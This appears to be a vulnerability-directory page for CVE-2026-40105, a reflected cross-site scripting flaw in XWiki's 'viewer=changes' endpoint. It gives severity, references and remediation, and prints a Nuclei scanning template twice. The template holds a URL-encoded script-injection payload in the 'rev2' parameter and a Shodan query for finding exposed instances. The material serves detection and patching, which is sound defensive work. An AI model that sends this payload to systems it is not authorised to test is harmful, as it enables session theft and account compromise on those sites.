XWiki - Cross-Site Scripting

CVE-2026-40105

Verified

Description

XWiki is vulnerable to reflected Cross-Site Scripting (XSS) via the `viewer=changes` endpoint. The `rev2` parameter is not properly sanitised before being rendered in the response, allowing an attacker to inject arbitrary JavaScript. Affects XWiki versions prior to the patched release.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

xwiki-platform

Published Date

May 4, 2026

Template Author

ritikchaddha

CVE-2026-40105.yaml

id: CVE-2026-40105

info:
  name: XWiki - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki is vulnerable to reflected Cross-Site Scripting (XSS) via the `viewer=changes` endpoint. The `rev2` parameter is not properly sanitised before being rendered in the response, allowing an attacker to inject arbitrary JavaScript. Affects XWiki versions prior to the patched release.
  impact: |
    Attackers can execute JavaScript in users' browsers, potentially compromising admin accounts and the entire XWiki instance.
  remediation: |
    Update to a version later than 17.10.0 or apply the patch to templates/changesdoc.vm manually.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40105
    - https://jira.xwiki.org/browse/XWIKI-22481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-40105
    epss-score: 0.00737
    epss-percentile: 0.7305
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.title:"XWiki"
  tags: cve,cve2026,xwiki,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Sandbox/?viewer=changes&rev1=9.1&rev2=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F17.6.0q1che%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Evfu80q44msz&form_token=test&language=en"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "<h1>Changes for page"
          - "From version"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204247801b95894a0c7c75f4d8ead0d8c1ff61adc39fd1816e06d75f088875a174022100db73fbe3aded7cc87af87795477160881311adea797b5e680ef7c39bd0251dac:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2026-40105

CWE ID:

cwe-79

References

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c https://nvd.nist.gov/vuln/detail/CVE-2026-40105 https://jira.xwiki.org/browse/XWIKI-22481

Remediation Steps

Update to a version later than 17.10.0 or apply the patch to templates/changesdoc.vm manually.

id: CVE-2026-40105

info:
  name: XWiki - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki is vulnerable to reflected Cross-Site Scripting (XSS) via the `viewer=changes` endpoint. The `rev2` parameter is not properly sanitised before being rendered in the response, allowing an attacker to inject arbitrary JavaScript. Affects XWiki versions prior to the patched release.
  impact: |
    Attackers can execute JavaScript in users' browsers, potentially compromising admin accounts and the entire XWiki instance.
  remediation: |
    Update to a version later than 17.10.0 or apply the patch to templates/changesdoc.vm manually.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40105
    - https://jira.xwiki.org/browse/XWIKI-22481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-40105
    epss-score: 0.00737
    epss-percentile: 0.7305
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.title:"XWiki"
  tags: cve,cve2026,xwiki,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Sandbox/?viewer=changes&rev1=9.1&rev2=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F17.6.0q1che%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Evfu80q44msz&form_token=test&language=en"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "<h1>Changes for page"
          - "From version"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204247801b95894a0c7c75f4d8ead0d8c1ff61adc39fd1816e06d75f088875a174022100db73fbe3aded7cc87af87795477160881311adea797b5e680ef7c39bd0251dac:922c64590222798bb761d5b6d8e72950

XWiki - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

XWiki - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps